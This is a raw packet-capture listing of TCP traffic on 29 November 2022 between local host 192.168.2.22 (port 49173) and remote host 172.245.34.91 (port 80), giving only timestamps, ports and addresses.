                                              Nov 29, 2022 08:13:05.973280907 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973337889 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973366022 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973385096 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973393917 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973407030 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973422050 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973445892 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973452091 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973469019 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973480940 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973507881 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973510027 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973535061 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973537922 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973546982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973576069 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973583937 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973604918 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973627090 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973640919 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973649025 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973670006 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973678112 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973699093 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973706961 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973727942 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973751068 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973759890 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973767996 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973788977 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973798037 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973818064 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973826885 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973845959 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973854065 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973875046 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973885059 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973901033 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973911047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973929882 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973936081 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973961115 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973968983 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.973989964 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.973998070 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974019051 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.974028111 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974049091 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.974056005 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974077940 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.974085093 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974104881 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.974112034 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974134922 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:05.974143982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.974174023 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:05.979733944 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093661070 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093696117 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093713045 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093730927 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093750954 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093770027 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093782902 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093784094 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093787909 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093806982 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.093833923 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093833923 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093833923 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.093849897 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100689888 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100725889 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100743055 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100764036 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100784063 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100801945 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100800991 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100820065 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100838900 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100856066 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100873947 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100892067 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100909948 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100914001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100928068 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100944042 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100944042 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100946903 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100965023 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.100980997 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.100982904 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101001024 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101020098 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101037025 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101053953 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101053953 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101056099 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101053953 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101053953 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101074934 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101077080 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101095915 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101106882 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101106882 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101115942 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101119995 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101130009 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101149082 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101161003 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101166964 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101171970 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101183891 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101191998 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101202965 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101208925 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101221085 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101237059 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101238966 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101248026 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101258039 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101273060 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101273060 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101275921 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101295948 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101303101 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101314068 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101315022 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101334095 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101344109 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101351976 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101367950 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101367950 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101368904 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101387024 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101388931 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101406097 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101413965 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101424932 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101435900 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101445913 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101464987 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.101466894 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101466894 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101481915 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.101500034 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.102027893 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215430021 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215470076 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215497971 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215518951 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215523958 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215553999 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215555906 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215555906 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215574980 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215583086 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215603113 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215611935 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215636015 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215640068 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215656996 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215667009 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215683937 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215693951 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215719938 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215723038 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215747118 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.215749025 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215766907 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.215794086 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.216893911 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.216928005 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.216955900 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.216973066 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.216983080 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.216995955 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.217009068 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.217039108 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222635984 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222665071 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222683907 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222702026 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222718954 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222738981 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222758055 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222755909 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222755909 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222779989 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222800016 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222805977 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222805977 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222805977 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222820044 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222826958 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222841024 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222855091 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222861052 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222868919 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222901106 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222919941 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222938061 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222940922 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222940922 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222956896 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222975969 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.222980976 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222981930 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.222995043 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223012924 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223021984 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223021984 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223021984 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223032951 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223040104 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223053932 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223062038 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223073959 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223083019 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223093033 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223107100 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223112106 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223123074 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223133087 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223146915 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223153114 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223171949 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223189116 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223201990 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223211050 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223211050 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223228931 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223233938 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223238945 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223242044 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223257065 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223257065 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223275900 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223279953 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223292112 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223295927 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223315001 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223320961 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223334074 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223336935 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223352909 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223355055 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223373890 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223375082 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223392963 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223397017 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223411083 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223412991 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223431110 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223432064 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223452091 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223469019 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223470926 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223489046 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223498106 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223498106 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223507881 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223524094 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223527908 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223536968 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223548889 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223558903 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223567963 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223573923 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223588943 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223598957 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223608971 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223614931 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223628998 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223639965 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223649025 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223651886 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223669052 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223678112 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223687887 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223700047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223706961 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223721981 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223726034 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223745108 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223746061 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223764896 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223771095 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223772049 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223784924 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223803043 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223803997 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223819017 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223823071 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223829985 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223843098 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223860979 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223879099 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223884106 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223897934 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223907948 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223916054 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223926067 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223936081 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223951101 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223956108 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223964930 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223977089 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.223992109 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.223995924 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224004984 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224014997 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224026918 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224034071 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224039078 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224054098 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224070072 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224071980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224081039 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224092960 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224102020 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224112034 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224119902 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224132061 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224144936 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224152088 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224169016 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224173069 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224189043 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224195004 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224203110 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224215031 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224226952 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224234104 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224247932 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224253893 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224258900 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224275112 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.224287033 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.224298954 CET4917380192.168.2.22172.245.34.91
